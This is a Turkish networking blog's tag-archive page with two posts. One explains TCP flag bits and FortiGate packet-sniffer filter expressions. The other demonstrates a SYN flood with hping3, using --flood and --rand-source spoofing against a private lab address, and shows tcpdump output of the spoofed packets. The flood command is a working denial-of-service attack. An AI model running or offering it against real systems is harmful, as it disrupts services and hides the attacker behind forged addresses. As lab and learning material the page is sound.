Etiket arşivi: tcp

fortigate de TCP bağlantılarında flaglara göre paket dinlemek

Bildiğiniz üzere iletişim tcp protokolü kullnaılarak gerçekleştirilir. Tcp protokolünün özelliklerinden bahsetmeyeceğim. Zaten internet üzerinde paket yapısıyla ilgili detaylı döküman bulmak mümkün. Tcp paketinde önemli olan nokta bayrak [flag] alanlarıdır. Bir bağlantının durumuyla ilgili yada paketin durumuyla ilgili bilgileri alabiliriz.

0 15 31
-----------------------------------------------------------------
| source port | destination port |
-----------------------------------------------------------------
| sequence number |
-----------------------------------------------------------------
| acknowledgment number |
-----------------------------------------------------------------
| HL | rsvd |C|E|U|A|P|R|S|F| window size |
-----------------------------------------------------------------
| TCP checksum | urgent pointer |
-----------------------------------------------------------------

kısaca tcp paket yapısı yukarıdaki gibidir. Burada

|C|E|U|A|P|R|S|F| <- TCP and ECN flags
|---------------|
|0 0 0 0 0 0 1 0| <- bit value
|---------------|
|7 6 5 4 3 2 1 0| <- bit position

flagların yapısı yer almaktadır.

| bit | dec. | bit | | TCP
| pos. | value | value | total | Flag
____|______|________|_______|_______|_____
| | | | |
2 ^ 7 = 128, x 0 = 0 | CWR (ECN Congestion Window Reduced)
2 ^ 6 = 64, x 0 = 0 | ECE (ECN Capable Echo)
2 ^ 5 = 32, x 0 = 0 | URG
2 ^ 4 = 16, x 0 = 0 | ACK
2 ^ 3 = 8, x 0 = 0 | PSH
2 ^ 2 = 4, x 0 = 0 | RST
2 ^ 1 = 2, x 1 = 2 | SYN*
2 ^ 0 = 1, x 0 = 0 | FIN
____|______|________|_______|_______|_____
sum: 2
==========================================
('2 ^ 7 = 128' >> '2 üzeri 7 = 128 dir')

yukarıda ki tabloda flag çözümleme tablosu yer almaktadır. Tablonun en altında ki toplam alanında oluşan değere göre paketin bayrak alanı doldurulur. Yukarıdaki örnekte toplam 2 olduğu için bayrak syn bayrağıdır. Aşağıda bu flagların ne anlama geldiği bilgisi vardır.

URG=1:Bu durum alıcıya aldığı dataları işlemeden OOB(out of bank data-bant dışı veri) verisi göndermesine olanak sağlar.

ACK=1:Bu durum bilgi (Acknowledgement) numarasının geçerli olduğunu belirtir. TCP bağlantı durumundadır. Gönderilen verinin iletim parçaları kullanılabilir durumdadır.

SYN=1:Tcp bağlantısının kurulacağını belirtir.

FIN=1:bağlantının sonlanaçağını belirtir.

RST=1:bağlantının düzeltilemeyecek hatalar nedeniyle sonlandırılacağı anlamına gelir. RST alındığı zaman alıcı derhal bağlantıyı sonlandırmak zorunda kalır. RST her iki tarafında bağlantıyı kesmesine ve verilerin kaybolmasına sebeb olur.

PSH=1:Bu durumda TCP modülü aldığı veriyi acilen bir üst protokol katmanına aktarır.

aşağıda SYN ACK paketinin tablosu vardır.

| bit | dec. | bit | | TCP
| pos. | value | value | total | Flag
____|______|________|_______|____________
| | | | |
2 ^ 7 = 128, x 0 = 0 | CWR (ECN Congestion Window Reduced)
2 ^ 6 = 64, x 0 = 0 | ECE (ECN Capable Echo)
2 ^ 5 = 32, x 0 = 0 | URG
2 ^ 4 = 16, x 1 = 16 | ACK*
2 ^ 3 = 8, x 0 = 0 | PSH
2 ^ 2 = 4, x 0 = 0 | RST
2 ^ 1 = 2, x 1 = 2 | SYN*
2 ^ 0 = 1, x 0 = 0 | FIN
____|______|________|_______|_______|_____
sum: 18
==========================================

bu bilgilerden yola çıkarak fortigate de bağlantı çeşidine (flaglar) gelen bağlantıları listeleyalim.

‘tcp[13]==1’ FIN bit set to 1;
‘tcp[13]&4==4’ RST bit set to 1;
‘tcp[13]&8==8’ PSH bit set to 1;
‘tcp[13]==16’ ACK bit set to 1;
‘tcp[13]&32==32’ URG bit set to 1;
‘tcp[13]&64==64’ ECE bit set to 1;
‘tcp[13]&128==128’ CWR bit set to 1;
‘tcp[13]==24’ PSH and ACK bits set to 1;

# diag sniff packet wan1 ‘tcp[13]==2’
Flag durumu SYN olan bağlantıları
# diag sniff packet wan1 ‘port 80 and tcp[13]&2==2’
Flag durumu SYN olan ve 80. porta olan bağlantıları

# diag sniffer packet internal ‘port 80 or 443 and tcp[13]&2==2’

Flag durumu SYN olan ve http,https portlarına gelen istekleri

görmemizi sağlar.

Reklamlar

hping ve flood


root@bt:~# hping3 -d 122 -S -w 64 -p 80 10.56.90.12 --flood --rand-source
using eth0, addr: 10.56.90.15, MTU: 1500
HPING 10.56.90.12 (eth0 10.56.90.12): S set, 40 headers + 120 data bytes

--- 10.56.90.12 hping statistic ---
100 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
-d 122:122 byte'lık data
-S:SIN bayrağı
-w 64:64 TTL 
-p 80: dst port 80
--rand-source: src ip ler random oluşturulsun.
--flood : flood mod kullan. 

flood modda bir kaç saniye içerisinde hedefe 1000’ler ce paket gönderimi yapılabilir. Yukarıda ki komutla 10.56.90.12 nolu makinaya her paket farklı kaynaklardan geliyor gibi SYN paketleri gönderdik. tcpdump çıktısı aşağıdadır.root@bt:/etc/network# tcpdump dst host 10.56.90.12
tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
listening on eth0, link-type EN10MB (Ethernet), capture size 96 bytes
17:47:17.600589 IP 209.122.151.139.2406 > 10.56.90.12.www: S 1436648546:1436648668(122) win 64
17:47:17.601995 IP 178.81.255.60.2407 > 10.56.90.12.www: S 1705955575:1705955697(122) win 64
17:47:17.602201 IP 19.206.43.55.2408 > 10.56.90.12.www: S 1562290490:1562290612(122) win 64
17:47:17.602374 IP 36.189.9.197.2409 > 10.56.90.12.www: S 604641588:604641710(122) win 64
17:47:17.602530 IP 196.0.180.214.2410 > 10.56.90.12.www: S 1803770982:1803771104(122) win 64
17:47:17.602720 IP AAnnecy-551-1-17-160.w92-153.abo.wanadoo.fr.2411 > 10.56.90.12.www: S 288343201:288343323(122) win 64
17:47:17.602887 IP 120.185.180.254.2412 > 10.56.90.12.www: S 813778207:813778329(122) win 64
17:47:17.603042 IP 23.140.235.139.2413 > 10.56.90.12.www: S 656869372:656869494(122) win 64
17:47:17.603208 IP 224.9.55.23.2414 > 10.56.90.12.www: S 1015093568:1015093690(122) win 64
17:47:17.603360 IP 180.71.183.204.2415 > 10.56.90.12.www: S 1877170202:1877170324(122) win 64
17:47:17.603561 IP 162.221.67.19.2416 > 10.56.90.12.www: S 1513053936:1513054058(122) win 64
17:47:17.603716 IP 197.0.209.215.2417 > 10.56.90.12.www: S 876153697:876153819(122) win 64
17:47:17.603856 IP 125.26.125.157.adsl.dynamic.totbb.net.2418 > 10.56.90.12.www: S 843277992:843278114(122) win 64
17:47:17.604010 IP h223s10a9n47.user.nortelnetworks.com.2419 > 10.56.90.12.www: S 1567951363:1567951485(122) win 64
17:47:17.604177 IP 216-229-69-16-empty.fidnet.com.2420 > 10.56.90.12.www: S 2132378618:2132378740(122) win 64
17:47:17.604331 IP 100.183.141.52.2421 > 10.56.90.12.www: S 404964666:404964788(122) win 64
17:47:17.604482 IP 211.170.169.93.2422 > 10.56.90.12.www: S 1346133522:1346133644(122) win 64
17:47:17.604635 IP 163.242.189.52.2423 > 10.56.90.12.www: S 1804076725:1804076847(122) win 64
17:47:17.604819 IP 140.37.131.254.2424 > 10.56.90.12.www: S 99362479:99362601(122) win 64
17:47:17.604976 IP 254.154.21.43.2425 > 10.56.90.12.www: S 1266537163:1266537285(122) win 64
17:47:17.605110 IP 127.255.160.209.2426 > 10.56.90.12.www: S 2003554614:2003554736(122) win 64
17:47:17.605261 IP 178.190.187.221.2427 > 10.56.90.12.www: S 537031363:537031485(122) win 64
17:47:17.605403 IP 252.17.81.20.2428 > 10.56.90.12.www: S 1366970421:1366970543(122) win 64
^C17:47:17.605577 IP 28.81.43.5.2429 > 10.56.90.12.www: S 849389274:849389396(122) win 64

24 packets captured
16315 packets received by filter
16036 packets dropped by kernel